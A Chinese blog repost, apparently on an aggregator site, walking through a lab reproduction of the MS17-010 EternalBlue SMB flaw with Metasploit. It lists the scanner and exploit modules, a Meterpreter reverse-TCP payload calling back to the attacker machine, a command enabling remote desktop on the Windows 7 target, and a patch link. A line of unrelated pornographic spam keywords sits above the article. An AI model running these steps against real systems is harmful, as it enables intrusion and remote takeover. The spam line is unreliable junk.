日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Metasploit-MS17-010(永恒之蓝 EternalBlue )复现

發布時間:2024/3/26 编程问答 40 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Metasploit-MS17-010(永恒之蓝 EternalBlue )复现 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

一. 概述

此安全更新程序修復了 Microsoft Windows 中的多個漏洞。如果攻擊者向 Windows SMBv1 服務器發送特殊設計的消息,那么其中最嚴重的漏洞可能允許遠程執行代碼。

對于 Microsoft Windows 的所有受支持版本,此安全更新的等級為“嚴重”。有關詳細信息,請參閱受影響的軟件和漏洞嚴重等級部分。

此安全更新可通過更正 SMBv1 處理經特殊設計的請求的方式來修復這些漏洞。

有關這些漏洞的詳細信息,請參閱漏洞信息部分。

EternalChampion 永恒冠軍(CVE-2017-0146 & CVE-2017-0147)
EternalRomance 永恒浪漫(MS17_010)
Eternal Synergy永恒協作(CVE-2017-0143)
EternalBlue 永恒之藍(MS17_010)


詳情請查閱下方微軟官方文檔

概覽
中文名:永恒之藍
微軟官方編號:MS17-010
CVE編號:CVE-2017-0143
類型:遠程代碼執行
官方評級:嚴重
影響系統:win7,winserver08,winserver08r2,win8.1,winserver12,winserver12r2,win10,winserver16

二. 復現

攻擊機靶機
IP:192.168.199.130192.168.199.209
OS:kali-linuxwin7

ms17-010用的smb445端口

$ use auxiliary/scanner/smb/smb_ms17_010 //掃描模塊 $ set rhosts 192.168.199.209 $ exploit

$ use exploit/windows/smb/ms17_010_eternalblue //攻擊模塊 $ set payload windows/x64/meterpreter/reverse_tcp $ set lhost 192.168.199.130 $ set rhosts 192.168.199.209 $ run getgui -e //打開3389端口

靶機3389端口打開

$ rdesktop 192.168.199.209

三. 補丁

https://support.microsoft.com/zh-cn/help/4012598/title

總結

以上是生活随笔為你收集整理的Metasploit-MS17-010(永恒之蓝 EternalBlue )复现的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。